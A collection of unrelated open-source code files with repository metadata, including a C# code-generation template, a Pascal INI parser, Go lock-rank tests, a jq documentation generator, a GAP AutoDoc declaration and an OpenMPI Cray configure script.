public {{DotNetType}}{{#if IsDotNetNullable}}?{{/if}} {{pascal NameAlias}} { get; set; }
{{#unless @last}}
{{else}}
{{#unless @../last}}
{{/unless}}
{{/unless}}
{{/each}}
{{/each}}
{{#each JoinCdcChildren}}
{{#ifeq JoinCardinality 'OneToMany'}}
/// <summary>
/// Gets or sets the related (one-to-many) <see cref="{{Parent.ModelName}}Cdc.{{ModelName}}Collection"/> (database table '{{Schema}}.{{TableName}}').
/// </summary>
[JsonProperty("{{camel PropertyName}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
[MapperIgnore()]
public {{Parent.ModelName}}Cdc.{{ModelName}}CdcCollection? {{PropertyName}} { get; set; }
{{else}}
/// <summary>
/// Gets or sets the related (one-to-one) <see cref="{{Parent.ModelName}}Cdc.{{ModelName}}"/> (database table '{{Schema}}.{{TableName}}').
/// </summary>
[JsonProperty("{{camel PropertyName}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
[MapperIgnore()]
public {{Parent.ModelName}}Cdc.{{ModelName}}Cdc? {{PropertyName}} { get; set; }
{{/ifeq}}
{{/each}}
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public bool HasUniqueKey => true;
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public UniqueKey UniqueKey => new UniqueKey({{#each PrimaryKeyColumns}}{{#unless @first}}, {{/unless}}{{pascal NameAlias}}{{/each}});
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public string[] UniqueKeyProperties => new string[] { {{#each PrimaryKeyColumns}}{{#unless @first}}, {{/unless}}nameof({{pascal NameAlias}}){{/each}} };
{{#each JoinHierarchyReverse}}
{{#unless @last}}
{{#each OnSelectColumns}}
/// <summary>
/// Gets or sets the '{{Parent.JoinTo}}_{{Name}}' additional joining column (informational); for internal join use only (not serialized).
/// </summary>
public {{ToDbColumn.DotNetType}} {{Parent.JoinTo}}_{{Name}} { get; set; }
{{/each}}
{{/unless}}
{{/each}}
}
/// <summary>
/// Represents the CDC model for the related (child) database table collection '{{Schema}}.{{Name}}'.
/// </summary>
public partial class {{ModelName}}CdcCollection : List<{{ModelName}}Cdc> { }
#endregion
{{/each}}
}
}
#pragma warning restore
#nullable restore | Harbour | 5 | ualehosaini/Beef | tools/Beef.CodeGen.Core/Templates/DbCdcEntity_cs.hb | [
"MIT"
] |
package gw.specContrib.classes.property_Declarations.gosuClassGosuEnh
uses java.lang.Integer
uses java.util.ArrayList
enhancement Errant_GosuEnh_62: Errant_GosuClass_62 {
//This should be error - IDE-1817
function setMyProperty1(a: ArrayList<Integer>) {} //## issuekeys: CONFLICT
//This should be error - IDE-1817
function setMyProperty2(a: ArrayList<Integer>) {} //## issuekeys: CONFLICT
function getMyProperty3() : ArrayList<Integer> {return null} //## issuekeys: THE METHOD 'GETMYPROPERTY3()' IS ALREADY DEFINED IN THE TYPE 'GW.SPECCONTRIB.AAA.PARSERVSOPENSOURCE.PROPERTIES.PREPARINGFORPUSH.GOSUCLASSGOSUENH.ERRANT_GOSUCLASS_62'. ENHANCEMENTS CANNOT OVERRIDE METHODS.
function getMyProperty4() : ArrayList<Integer> {return null} //## issuekeys: THE METHOD 'GETMYPROPERTY4()' IS ALREADY DEFINED IN THE TYPE 'GW.SPECCONTRIB.AAA.PARSERVSOPENSOURCE.PROPERTIES.PREPARINGFORPUSH.GOSUCLASSGOSUENH.ERRANT_GOSUCLASS_62'. ENHANCEMENTS CANNOT OVERRIDE METHODS.
}
| Gosu | 3 | tcmoore32/sheer-madness | gosu-test/src/test/gosu/gw/specContrib/classes/property_Declarations/gosuClassGosuEnh/Errant_GosuEnh_62.gsx | [
"Apache-2.0"
] |
{
Copyright 2014 Stas'M Corp.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
}
unit LiteINI;
interface
uses
SysUtils;
type
SList = Array of String;
INIValue = record
Name: String;
Value: String;
end;
INISection = record
Name: String;
Values: Array of INIValue;
end;
INIFile = Array of INISection;
procedure SListClear(var List: SList);
function SListAppend(var List: SList; S: String): Integer;
function SListFind(List: SList; Value: String): Integer;
function INIFindSection(INI: INIFile; Section: String): Integer;
function INIFindValue(INI: INIFile; Section: Integer; Value: String): Integer;
function INIAddSection(var INI: INIFile; Section: String): Integer;
function INIAddValue(var INI: INIFile; Section: Integer; ValueName, Value: String): Integer;
procedure INIUnload(var INI: INIFile);
procedure INILoad(var INI: INIFile; FileName: String);
function INISectionExists(INI: INIFile; Section: String): Boolean;
function INIValueExists(INI: INIFile; Section: String; Value: String): Boolean;
function INIReadSectionLowAPI(INI: INIFile; Section: Integer; var List: SList): Boolean;
function INIReadSection(INI: INIFile; Section: String): SList;
function INIReadStringLowAPI(INI: INIFile; Section, Value: Integer; var Str: String): Boolean;
function INIReadString(INI: INIFile; Section, Value, Default: String): String;
function INIReadInt(INI: INIFile; Section, Value: String; Default: Integer): Integer;
function INIReadDWord(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
function INIReadIntHex(INI: INIFile; Section, Value: String; Default: Integer): Integer;
function INIReadDWordHex(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
function INIReadBool(INI: INIFile; Section, Value: String; Default: Boolean): Boolean;
function INIReadBytes(INI: INIFile; Section, Value: String): TBytes;
function INIReadBytesDef(INI: INIFile; Section, Value: String; Default: TBytes): TBytes;
implementation
procedure SListClear(var List: SList);
begin
SetLength(List, 0);
end;
function SListAppend(var List: SList; S: String): Integer;
begin
SetLength(List, Length(List) + 1);
List[Length(List) - 1] := S;
Result := Length(List) - 1;
end;
function SListFind(List: SList; Value: String): Integer;
var
I: Integer;
begin
Result := -1;
for I := 0 to Length(List) - 1 do
if List[I] = Value then begin
Result := I;
Break;
end;
end;
function INIFindSection(INI: INIFile; Section: String): Integer;
var
I: Integer;
begin
Result := -1;
for I := 0 to Length(INI) - 1 do
if INI[I].Name = Section then begin
Result := I;
Exit;
end;
end;
function INIFindValue(INI: INIFile; Section: Integer; Value: String): Integer;
var
I: Integer;
begin
Result := -1;
if (Section < 0) or (Section >= Length(INI)) then
Exit;
for I := 0 to Length(INI[Section].Values) - 1 do
if INI[Section].Values[I].Name = Value then begin
Result := I;
Exit;
end;
end;
function INIAddSection(var INI: INIFile; Section: String): Integer;
begin
Result := INIFindSection(INI, Section);
if Result >= 0 then
Exit;
Result := Length(INI);
SetLength(INI, Result + 1);
INI[Result].Name := Section;
SetLength(INI[Result].Values, 0);
end;
function INIAddValue(var INI: INIFile; Section: Integer; ValueName, Value: String): Integer;
var
I: Integer;
begin
Result := -1;
if (Section < 0) or (Section >= Length(INI)) then
Exit;
I := INIFindValue(INI, Section, ValueName);
if I = -1 then begin
Result := Length(INI[Section].Values);
SetLength(INI[Section].Values, Result + 1);
INI[Section].Values[Result].Name := ValueName;
INI[Section].Values[Result].Value := Value;
end else begin
INI[Section].Values[I].Value := Value;
Result := I;
end;
end;
procedure INIUnload(var INI: INIFile);
begin
SetLength(INI, 0);
end;
procedure INILoad(var INI: INIFile; FileName: String);
var
F: TextFile;
S, ValueName, Value: String;
INIList: SList;
I, Sect: Integer;
begin
INIUnload(INI);
if not FileExists(FileName) then
Exit;
AssignFile(F, FileName);
Reset(F);
// Read and filter lines
while not EOF(F) do begin
Readln(F, S);
if (Pos(';', S) <> 1)
and (Pos('#', S) <> 1)
and (
((Pos('[', S) > 0) and (Pos(']', S) > 0)) or
(Pos('=', S) > 0)
)
then
SListAppend(INIList, S);
end;
CloseFile(F);
// Parse 2 (parse format)
Sect := -1;
for I := 0 to Length(INIList) - 1 do begin
S := Trim(INIList[I]);
if Length(S) >= 2 then
if (S[1] = '[') and (S[Length(S)] = ']') then begin
S := Trim(Copy(S, 2, Length(S) - 2));
Sect := INIAddSection(INI, S);
Continue;
end;
S := INIList[I];
if Pos('=', S) > 0 then begin
ValueName := Trim(Copy(S, 1, Pos('=', S) - 1));
Value := Copy(S, Pos('=', S) + 1, Length(S) - Pos('=', S));
if Sect = -1 then
Sect := INIAddSection(INI, '');
INIAddValue(INI, Sect, ValueName, Value);
end;
end;
end;
function INISectionExists(INI: INIFile; Section: String): Boolean;
begin
Result := INIFindSection(INI, Section) > -1;
end;
function INIValueExists(INI: INIFile; Section: String; Value: String): Boolean;
var
Sect: Integer;
begin
Sect := INIFindSection(INI, Section);
Result := INIFindValue(INI, Sect, Value) > -1;
end;
function INIReadSectionLowAPI(INI: INIFile; Section: Integer; var List: SList): Boolean;
var
I: Integer;
begin
Result := False;
SetLength(List, 0);
if (Section < 0) or (Section >= Length(INI)) then
Exit;
for I := 0 to Length(INI[Section].Values) - 1 do
SListAppend(List, INI[Section].Values[I].Name);
Result := True;
end;
function INIReadSection(INI: INIFile; Section: String): SList;
var
Sect: Integer;
begin
Sect := INIFindSection(INI, Section);
INIReadSectionLowAPI(INI, Sect, Result);
end;
function INIReadStringLowAPI(INI: INIFile; Section, Value: Integer; var Str: String): Boolean;
begin
Result := False;
if (Section < 0) or (Section >= Length(INI)) then
Exit;
if (Value < 0) or (Value >= Length(INI[Section].Values)) then
Exit;
Str := INI[Section].Values[Value].Value;
Result := True;
end;
function INIReadString(INI: INIFile; Section, Value, Default: String): String;
var
Sect, Val: Integer;
begin
Sect := INIFindSection(INI, Section);
Val := INIFindValue(INI, Sect, Value);
if not INIReadStringLowAPI(INI, Sect, Val, Result) then
Result := Default;
end;
function INIReadInt(INI: INIFile; Section, Value: String; Default: Integer): Integer;
var
S: String;
E: Integer;
begin
S := INIReadString(INI, Section, Value, '');
Val(S, Result, E);
if E <> 0 then
Result := Default;
end;
function INIReadDWord(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
var
S: String;
E: Integer;
begin
S := INIReadString(INI, Section, Value, '');
Val(S, Result, E);
if E <> 0 then
Result := Default;
end;
function INIReadIntHex(INI: INIFile; Section, Value: String; Default: Integer): Integer;
var
S: String;
E: Integer;
begin
S := INIReadString(INI, Section, Value, '');
Val('$'+S, Result, E);
if E <> 0 then
Result := Default;
end;
function INIReadDWordHex(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
var
S: String;
E: Integer;
begin
S := INIReadString(INI, Section, Value, '');
Val('$'+S, Result, E);
if E <> 0 then
Result := Default;
end;
function INIReadBool(INI: INIFile; Section, Value: String; Default: Boolean): Boolean;
var
S: String;
I: Cardinal;
E: Integer;
begin
S := INIReadString(INI, Section, Value, '');
Val(S, I, E);
if E <> 0 then
Result := Default
else
Result := I > 0;
end;
function StringToBytes(S: String; var B: TBytes): Boolean;
var
I: Integer;
begin
Result := False;
if Odd(Length(S)) then
Exit;
SetLength(B, Length(S) div 2);
for I := 0 to Length(B) - 1 do begin
B[I] := 0;
case S[(I*2)+2] of
'0': ;
'1': B[I] := B[I] or $1;
'2': B[I] := B[I] or $2;
'3': B[I] := B[I] or $3;
'4': B[I] := B[I] or $4;
'5': B[I] := B[I] or $5;
'6': B[I] := B[I] or $6;
'7': B[I] := B[I] or $7;
'8': B[I] := B[I] or $8;
'9': B[I] := B[I] or $9;
'A','a': B[I] := B[I] or $A;
'B','b': B[I] := B[I] or $B;
'C','c': B[I] := B[I] or $C;
'D','d': B[I] := B[I] or $D;
'E','e': B[I] := B[I] or $E;
'F','f': B[I] := B[I] or $F;
else Exit;
end;
case S[(I*2)+1] of
'0': ;
'1': B[I] := B[I] or $10;
'2': B[I] := B[I] or $20;
'3': B[I] := B[I] or $30;
'4': B[I] := B[I] or $40;
'5': B[I] := B[I] or $50;
'6': B[I] := B[I] or $60;
'7': B[I] := B[I] or $70;
'8': B[I] := B[I] or $80;
'9': B[I] := B[I] or $90;
'A','a': B[I] := B[I] or $A0;
'B','b': B[I] := B[I] or $B0;
'C','c': B[I] := B[I] or $C0;
'D','d': B[I] := B[I] or $D0;
'E','e': B[I] := B[I] or $E0;
'F','f': B[I] := B[I] or $F0;
else Exit;
end;
end;
Result := True;
end;
function INIReadBytes(INI: INIFile; Section, Value: String): TBytes;
var
S: String;
begin
S := INIReadString(INI, Section, Value, '');
if not StringToBytes(S, Result) then
SetLength(Result, 0);
end;
function INIReadBytesDef(INI: INIFile; Section, Value: String; Default: TBytes): TBytes;
var
S: String;
begin
S := INIReadString(INI, Section, Value, '');
if not StringToBytes(S, Result) then
Result := Default;
end;
end.
| Pascal | 3 | ahmedsweed/rdpwrap | src-x86-binarymaster/LiteINI.pas | [
"Apache-2.0"
] |
CREATE TABLE "public"."table24"("name" text NOT NULL, "id" serial NOT NULL, PRIMARY KEY ("id") );
| SQL | 4 | devrsi0n/graphql-engine | cli/commands/testdata/migrate-squash-test/migrations/1588172669359_create_table_public_table24/up.sql | [
"Apache-2.0",
"MIT"
] |
' stripdir.bmx
print stripdir("mypath/myfile.bmx") 'prints myfile.bmx
| BlitzMax | 3 | jabdoa2/blitzmax | mod/brl.mod/filesystem.mod/doc/stripdir.bmx | [
"Zlib"
] |
%hr/
BBB
%hr/
| Scaml | 0 | mohno007/skinny-framework | example/src/main/webapp/WEB-INF/views/custom-layout/bar.html.scaml | [
"MIT"
] |
Red [
Title: "GUI event flows testing script"
Author: "Nenad Rakocevic"
File: %events-flow.red
Needs: 'View
]
system/view/capturing?: yes
view/options [
panel 200x200 blue [
panel 150x150 green [
base 50x50 red
on-detect [if event/type = 'down [print "4"]]
on-down [print "5"]
]
on-detect [if event/type = 'down [print "3"]]
on-down [print "6"]
]
on-detect [if event/type = 'down [print "2"]]
on-down [print "7"]
][
actors: object [
on-detect: func [f e][if e/type = 'down [print "----^/1"]]
on-down: func [f e][print "8"]
]
]
system/view/capturing?: no | Red | 4 | 0xflotus/red | tests/events-flow.red | [
"BSL-1.0",
"BSD-3-Clause"
] |
// Copyright 2021 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package runtime_test
import (
. "runtime"
"testing"
)
// Check that the partial order in lockPartialOrder fits within the total order
// determined by the order of the lockRank constants.
func TestLockRankPartialOrder(t *testing.T) {
for r, list := range LockPartialOrder {
rank := LockRank(r)
for _, e := range list {
entry := LockRank(e)
if entry > rank {
t.Errorf("lockPartialOrder row %v entry %v is inconsistent with total lock ranking order", rank, entry)
}
}
}
}
// Verify that partial order lists are kept sorted. This is a purely cosemetic
// check to make manual reviews simpler. It does not affect correctness, unlike
// the above test.
func TestLockRankPartialOrderSortedEntries(t *testing.T) {
for r, list := range LockPartialOrder {
rank := LockRank(r)
var prev LockRank
for _, e := range list {
entry := LockRank(e)
if entry <= prev {
t.Errorf("Partial order for rank %v out of order: %v <= %v in %v", rank, entry, prev, list)
}
prev = entry
}
}
}
| Go | 5 | SSSDNSY/go | src/runtime/lockrank_test.go | [
"BSD-3-Clause"
] |
#!/usr/bin/env fq -rnf
def code: "`\(.)`";
def nbsp: gsub(" "; " ");
def has_section($f; $fhelp): $fhelp.notes or $fhelp.examples or $fhelp.links or $f.decode_in_arg;
def formats_list:
[ formats
| to_entries[] as {$key, $value}
| (_format_func($key; "_help")? // {}) as $fhelp
| if has_section($value; $fhelp) then "[\($key)](doc/formats.md#\($key))"
else $key
end
] | join(",\n");
def formats_table:
( [ {
name: "Name",
desc: "Description",
uses: "Dependencies"
},
{
name: "-",
desc: "-",
uses: "-"
},
( formats
| to_entries[]
| (_format_func(.key; "_help")? // {}) as $fhelp
| {
name:
( ( .key as $format
| if has_section(.value; $fhelp) then "[\($format | code)](#\($format))"
else $format | code
end
)
+ " "
),
desc: (.value.description | nbsp),
uses: "<sub>\((((.value.dependencies | flatten | map(code)) | join(" "))? // ""))</sub>"
}
),
( [ formats
| to_entries[]
| . as $e
| select(.value.groups)
| .value.groups[] | {key: ., value: $e.key}
]
| reduce .[] as $e ({}; .[$e.key] += [$e.value])
| to_entries[]
| {
name: ((.key | code) + " "),
desc: "Group",
uses: "<sub>\(((.value | map(code)) | join(" ")))</sub>"
}
)
]
| table(
[ .name
, .desc
, .uses
];
[ ""
, (.[0] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, (.[1] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, .[2].string
, ""
] | join("|")
)
);
def formats_sections:
( formats[] as $f
| (_format_func($f.name; "_help")? // {} | _help_format_enrich("fq"; $f; false)) as $fhelp
| select(has_section($f; $fhelp))
| "### \($f.name)"
, ""
, ($fhelp.notes | if . then ., "" else empty end)
, if $f.decode_in_arg then
( "#### Options"
, ""
, ( [ { name: "Name"
, default: "Default"
, desc: "Description"
}
, { name: "-"
, default: "-"
, desc: "-"
}
, ( $f.decode_in_arg
| to_entries[] as {$key,$value}
| { name: ($key | code)
, default: ($value | tostring)
, desc: $f.decode_in_arg_doc[$key]
}
)
]
| table(
[ .name
, .default
, .desc
];
[ ""
, (.[0] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, (.[1] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, .[2].string
, ""
] | join("|")
)
)
, ""
)
else empty
end
, if $fhelp.examples then
( "#### Examples"
, ""
, ( $fhelp.examples[]
| "\(.comment)"
, if .shell then
( "```"
, "$ \(.shell)"
, "```"
)
elif .expr then
( "```"
, "... | \(.expr)"
, "```"
)
else empty
end
, ""
)
)
else empty
end
, if $fhelp.links then
( "#### References and links"
, ""
, ( $fhelp.links[]
| if .title then "- [\(.title)](\(.url))"
else "- \(.url)"
end
)
, ""
)
else empty
end
);
| JSONiq | 3 | bbhunter/fq | doc/formats.jq | [
"MIT"
] |
#############################################################################
##
## Magic.gd AutoDoc package
##
## Copyright 2013, Max Horn, JLU Giessen
## Sebastian Gutsche, University of Kaiserslautern
##
#############################################################################
#! @Description
#! This is the main function of the &AutoDoc; package. It can perform
#! any combination of the following three tasks:
#! <Enum>
#! <Item>
#! It can (re)generate a scaffold for your package manual.
#! That is, it can produce two XML files in &GAPDoc; format to be used as part
#! of your manual: First, a file named <F>doc/PACKAGENAME.xml</F>
#! (with your package's name substituted) which is used as
#! main file for the package manual, i.e. this file sets the
#! XML DOCTYPE and defines various XML entities, includes
#! other XML files (both those generated by &AutoDoc; as well
#! as additional files created by other means), tells &GAPDoc;
#! to generate a table of content and an index, and more.
#! Secondly, it creates a file <F>doc/title.xml</F> containing a title
#! page for your documentation, with information about your package
#! (name, description, version), its authors and more, based
#! on the data in your <F>PackageInfo.g</F>.
#! </Item>
#! <Item>
#! It can scan your package for &AutoDoc; based documentation (by using &AutoDoc;
#! tags and the Autodoc command.
#! This will
#! produce further XML files to be used as part of the package manual.
#! </Item>
#! <Item>
#! It can use &GAPDoc; to generate PDF, text and HTML (with
#! MathJaX enabled) documentation from the &GAPDoc; XML files it
#! generated as well as additional such files provided by you. For
#! this, it invokes <Ref Func='MakeGAPDocDoc' BookName='gapdoc'/>
#! to convert the XML sources, and it also instructs &GAPDoc; to copy
#! supplementary files (such as CSS style files) into your doc directory
#! (see <Ref Func='CopyHTMLStyleFiles' BookName='gapdoc'/>).
#! </Item>
#! </Enum>
#! For more information and some examples, please refer to Chapter <Ref Label='Tutorials'/>.
#! <P/>
#! The parameters have the following meanings:
#! <List>
#!
#! <Mark><A>package_name</A></Mark>
#! <Item>
#! The name of the package whose documentation should be(re)generated.
#! </Item>
#!
#!
#! <Mark><A>option_record</A></Mark>
#! <Item>
#! <A>option_record</A> can be a record with some additional options.
#! The following are currently supported:
#! <List>
#! <Mark><A>dir</A></Mark>
#! <Item>
#! This should be a string containing a (relative) path or a
#! Directory() object specifying where the package documentation
#! (i.e. the &GAPDoc; XML files) are stored.
#! <Br/>
#! <E>Default value: <C>"doc/"</C>.</E>
#! </Item>
#! <Mark><A>scaffold</A></Mark>
#! <Item>
#! This controls whether and how to generate scaffold XML files
#! for the main and title page of the package's documentation.
#! <P/>
#! The value should be either <K>true</K>, <K>false</K> or a
#! record. If it is a record or <K>true</K> (the latter is
#! equivalent to specifying an empty record), then this feature is
#! enabled. It is also enabled if <A>opt.scaffold</A> is missing but the
#! package's info record in <F>PackageInfo.g</F> has an <C>AutoDoc</C> entry.
#! In all other cases (in particular if <A>opt.scaffold</A> is
#! <K>false</K>), scaffolding is disabled.
#! <P/>
#!
#! If <A>opt.scaffold</A> is a record, it may contain the following entries.
#!
#### TODO: mention merging with PackageInfo.AutoDoc!
#! <List>
#!
#! <Mark><A>includes</A></Mark>
#! <Item>
#! A list of XML files to be included in the body of the main XML file.
#! If you specify this list and also are using &AutoDoc; to document
#! your operations with &AutoDoc; comments,
#! you can add <F>AutoDocMainFile.xml</F> to this list
#! to control at which point the documentation produced by &AutoDoc;
#! is inserted. If you do not do this, it will be added after the last
#! of your own XML files.
#! </Item>
#!
#! <Mark><A>appendix</A></Mark>
#! <Item>
#! This entry is similar to <A>opt.scaffold.includes</A> but is used
#! to specify files to include after the main body of the manual,
#! i.e. typically appendices.
#! </Item>
#!
#! <Mark><A>bib</A></Mark>
#! <Item>
#! The name of a bibliography file, in Bibtex or XML format.
#! If this key is not set, but there is a file <F>doc/PACKAGENAME.bib</F>
#! then it is assumed that you want to use this as your bibliography.
#! </Item>
#!
#### TODO: The 'entities' param is a bit strange. We should probably change it to be a bit more
#### general, as one might want to define other entities... For now, we do not document it
#### to leave us the choice of revising how it works.
####
#### <Mark><A>entities</A></Mark>
#### <Item>
#### A list of package names or other entities which are used to define corresponding XML entities.
#### For example, if set to a list containing the string <Q>SomePackage</Q>,
#### then the following is added to the XML preamble:
#### <Listing><![CDATA[<!ENTITY SomePackage '<Package>SomePackage</Package>'>]]></Listing>
#### This allows you to write <Q>&SomePackage;</Q> in your documentation
#### to reference that package. If another type of entity is desired, one can simply add,
#### instead of a string, add a two entry list <A>a</A> to the list. It will be handled as
#### <Listing><![CDATA[<!ENTITY a[ 2 ] '<a[ 1 ]>a[ 2 ]</a[ 1 ]>'>]]></Listing>,
#### so please be careful.
#### </Item>
#!
#! <Mark><A>TitlePage</A></Mark>
#! <Item>
#! A record whose entries are used to embellish the generated titlepage
#! for the package manual with extra information, such as a copyright
#! statement or acknowledgments. To this end, the names of the record
#! components are used as XML element names, and the values of the
#! components are outputted as content of these XML elements. For
#! example, you could pass the following record to set a custom
#! acknowledgements text:
#! <Listing><![CDATA[
#! rec( Acknowledgements := "Many thanks to ..." )]]></Listing>
#! For a list of valid entries in the titlepage, please refer to the
#! &GAPDoc; manual, specifically section <Ref Subsect='Title' BookName='gapdoc'/>
#! and following.
#! </Item>
#! <Mark><A>document_class</A></Mark>
#! <Item>
#! Sets the document class of the resulting pdf. The value can either be a string
#! which has to be the name of the new document class, a list containing this string, or
#! a list of two strings. Then the first one has to be the document class name, the second one
#! the option string ( contained in [ ] ) in LaTeX.
#! </Item>
#! <Mark><A>latex_header_file</A></Mark>
#! <Item>
#! Replaces the standard header from &GAPDoc; completely with the header in this LaTeX file.
#! Please be careful here, and look at GAPDoc's latexheader.tex file for an example.
#! </Item>
#! <Mark><A>gapdoc_latex_options</A></Mark>
#! <Item>
#! Must be a record with entries which can be understood by SetGapDocLaTeXOptions. Each entry can be a string, which
#! will be given to &GAPDoc; directly, or a list containing of two entries: The first one must be the string "file",
#! the second one a filename. This file will be read and then its content is passed to &GAPDoc; as option with the name
#! of the entry.
#! </Item>
#!
#! </List>
#! </Item>
#!
#!
#! <Mark><A>autodoc</A></Mark>
#! <Item>
#! This controls whether and how to generate addition XML documentation files
#! by scanning for &AutoDoc; documentation comments.
#! <P/>
#! The value should be either <K>true</K>, <K>false</K> or a
#! record. If it is a record or <K>true</K> (the latter is
#! equivalent to specifying an empty record), then this feature is
#! enabled. It is also enabled if <A>opt.autodoc</A> is missing but the
#! package depends (directly) on the &AutoDoc; package.
#! In all other cases (in particular if <A>opt.autodoc</A> is
#! <K>false</K>), this feature is disabled.
#! <P/>
#!
#! If <A>opt.autodoc</A> is a record, it may contain the following entries.
#!
#! <List>
#!
#! <Mark><A>files</A></Mark>
#! <Item>
#! A list of files (given by paths relative to the package directory)
#! to be scanned for &AutoDoc; documentation comments.
#! Usually it is more convenient to use <A>autodoc.scan_dirs</A>, see below.
#! </Item>
#!
#! <Mark><A>scan_dirs</A></Mark>
#! <Item>
#! A list of subdirectories of the package directory (given as relative paths)
#! which &AutoDoc; then scans for .gi, .gd and .g files; all of these files
#! are then scanned for &AutoDoc; documentation comments.
#! <Br/>
#! <E>Default value: <C>[ "gap", "lib", "examples", "examples/doc" ]</C>.</E>
#! </Item>
#!
#! <Mark><A>level</A></Mark>
#! <Item>
#! This defines the level of the created documentation. The default value is 0.
#! When parts of the manual are declared with a higher value
#! they will not be printed into the manual.
#! </Item>
#!
#### TODO: Document section_intros later on.
#### However, note that thanks to the new AutoDoc comment syntax, the only remaining
#### use for this seems to be the ability to specify the order of chapters and
#### sections.
#### <Mark><A>section_intros</A></Mark>
#### <Item>
#### TODO.
#### </Item>
#!
#! </List>
#! </Item>
#!
#!
#! <Mark><A>gapdoc</A></Mark>
#! <Item>
#! This controls whether and how to invoke &GAPDoc; to create HTML, PDF and text
#! files from your various XML files.
#! <P/>
#! The value should be either <K>true</K>, <K>false</K> or a
#! record. If it is a record or <K>true</K> (the latter is
#! equivalent to specifying an empty record), then this feature is
#! enabled. It is also enabled if <A>opt.gapdoc</A> is missing.
#! In all other cases (in particular if <A>opt.gapdoc</A> is
#! <K>false</K>), this feature is disabled.
#! <P/>
#!
#! If <A>opt.gapdoc</A> is a record, it may contain the following entries.
#!
#! <List>
#!
#!
#### Note: 'main' is strictly speaking also used for the scaffold.
#### However, if one uses the scaffolding mechanism, then it is not
#### really necessary to specify a custom name for the main XML file.
#### Thus, the purpose of this parameter is to cater for packages
#### that have existing documentation using a different XML name,
#### and which do not wish to use scaffolding.
####
#### This explain why we only allow specifying gapdoc.main.
#### The scaffolding code will still honor it, though, just in case.
#! <Mark><A>main</A></Mark>
#! <Item>
#! The name of the main XML file of the package manual.
#! This exists primarily to support packages with existing manual
#! which use a filename here which differs from the default.
#! In particular, specifying this is unnecessary when using scaffolding.
#! <Br/>
#! <E>Default value: <C>PACKAGENAME.xml</C></E>.
#! </Item>
#!
#! <Mark><A>files</A></Mark>
#! <Item>
#! A list of files (given by paths relative to the package directory)
#! to be scanned for &GAPDoc; documentation comments.
#! Usually it is more convenient to use <A>gapdoc.scan_dirs</A>, see below.
#! </Item>
#!
#! <Mark><A>scan_dirs</A></Mark>
#! <Item>
#! A list of subdirectories of the package directory (given as relative paths)
#! which &AutoDoc; then scans for .gi, .gd and .g files; all of these files
#! are then scanned for &GAPDoc; documentation comments.
#! <Br/>
#! <E>Default value: <C>[ "gap", "lib", "examples", "examples/doc" ]</C>.</E>
#! </Item>
#!
#! </List>
#! </Item>
## This is the maketest part. Still under construction.
#! <Mark><A>maketest</A></Mark>
#! <Item>
#! The maketest item can be true or a record. When it is true,
#! a simple maketest.g is created in the main package directory,
#! which can be used to test the examples from the manual. As a record,
#! the entry can have the following entries itself, to specify some options.
#! <List>
#! <Mark>filename</Mark>
#! <Item>
#! Sets the name of the test file.
#! </Item>
#! <Mark>commands</Mark>
#! <Item>
#! A list of strings, each one a command, which
#! will be executed at the beginning of the test file.
#! </Item>
#! </List>
#! </Item>
#!
#! </List>
#! </Item>
#! </List>
#!
#! @Returns nothing
#! @Arguments package_name[, option_record ]
#! @ChapterInfo AutoDoc, The AutoDoc() function
DeclareGlobalFunction( "AutoDoc" );
| GDScript | 5 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/GAP/Magic.gd | [
"MIT"
] |
@[if DEVELSPACE]@
# Env variables in develspace.
export ROVIO_CONFIG_DIR="@(CMAKE_CURRENT_SOURCE_DIR)/share/"
@[else]@
# Env variables in installspace.
export ROVIO_CONFIG_DIR="$CATKIN_ENV_HOOK_WORKSPACE/share/"
@[end if]@ | EmberScript | 3 | AdronTech/maplab | applications/rovioli/env-hooks/10.rovio-config-template.sh.em | [
"Apache-2.0"
] |
#!/bin/bash
# change the following for install path, note
# that VER is appended to the path.
VER="trunk"
SW_INSTALL_ROOT=/tmp/work/gshipman/ompi/install
PLATFORM=ornl/cray_xt_cnl_romio
ORTED_MAKEFILE=orte/tools/orted/Makefile
if test -z "`grep "orted_LDFLAGS =.*-all-static" ${ORTED_MAKEFILE}`"; then
echo "WARNING: patching ${ORTED_MAKEFILE} to build it static"
sed -i 's/orted_LDFLAGS =/orted_LDFLAGS = -all-static/g' ${ORTED_MAKEFILE}
fi
./configure \
NM=/usr/bin/nm \
CC=gcc \
CXX=g++ \
CFLAGS="-I/opt/xt-pe/default/include/ -I/opt/xt-catamount/default/catamount/linux/include/ " \
CPPFLAGS=-I/opt/xt-pe/default/include/ \
FCFLAGS=-I/opt/xt-pe/default/include/ \
FFLAGS=-I/opt/xt-pe/default/include/ \
LDFLAGS="-L/opt/xt-service/default/lib/snos64 -L/opt/xt-pe/default/cnos/linux/64/lib -L/opt/xt-mpt/default/lib/snos64" \
LIBS="-lpct -lalpslli -lalpsutil -lportals -lpthread" \
--with-wrapper-cflags="-Wmissing-prototypes -I/tmp/work/gshipman/ompi/install/trunk/include" \
--with-wrapper-ldflags="-Wmissing-prototypes -lnsl -lutil -lpct -lalpslli -lalpsutil -lportals -lpthread -lm -L/opt/xt-service/default/lib/snos64 -L/opt/xt-pe/default/cnos/linux/64/lib -L/opt/xt-mpt/default/lib/snos64"\
--build=x86_64-unknown-linux-gnu \
